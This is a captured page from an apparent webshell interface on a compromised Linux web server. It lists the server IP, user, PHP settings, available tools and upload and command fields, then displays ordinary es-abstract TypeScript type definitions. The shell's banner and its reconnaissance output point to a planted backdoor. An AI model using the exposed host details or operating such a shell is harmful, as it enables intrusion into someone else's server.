403Webshell
Server IP : 217.160.0.135  /  Your IP : 216.73.216.115
Web Server : Apache
System : Linux www 6.18.52-i1-ampere #1203 SMP Mon Sep 14 18:29:59 CEST 2026 aarch64
User : sws1074145052 ( 1074145052)
PHP Version : 8.3.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/share/nodejs/@types/es-abstract/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/nodejs/@types/es-abstract/index.d.ts
// Type definitions for es-abstract 1.17
// Project: https://github.com/ljharb/es-abstract
// Definitions by: Jordan Harband <https://github.com/ljharb>
//                 ExE Boss <https://github.com/ExE-Boss>
// Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped
// TypeScript Version: 3.8

import ES5 = require('./es5');
import ES6 = require('./es6');
import ES7 = require('./es7');

import ES2015 = require('./es2015');
import ES2016 = require('./es2016');
import ES2017 = require('./es2017');
import ES2018 = require('./es2018');
import ES2019 = require('./es2019');

declare namespace ESAbstract {
    // ES2015 types:
    type PropertyKey = string | symbol;

    // ES5 types:
    interface GenericDescriptor {
        '[[Configurable]]'?: boolean | undefined;
        '[[Enumerable]]'?: boolean | undefined;
    }

    interface AccessorDescriptor<T = unknown> extends GenericDescriptor {
        '[[Get]]'?(): T;
        '[[Set]]'?(value: T): void;
    }

    interface DataDescriptor<T = unknown> extends GenericDescriptor {
        '[[Writable]]'?: boolean | undefined;
        '[[Value]]'?: T | undefined;
    }

    type PropertyDescriptor<T = unknown> = AccessorDescriptor<T> | DataDescriptor<T>;
}

interface ESAbstract extends ES6 {
    readonly ES5: ES5;
    /** @deprecated */
    readonly ES6: ES6;
    /** @deprecated */
    readonly ES7: ES7;

    readonly ES2015: ES2015;
    readonly ES2016: ES2016;
    readonly ES2017: ES2017;
    readonly ES2018: ES2018;
    readonly ES2019: ES2019;
}

declare const ESAbstract: ESAbstract;
export = ESAbstract;

Youez - 2016 - github.com/yon3zu
LinuXploit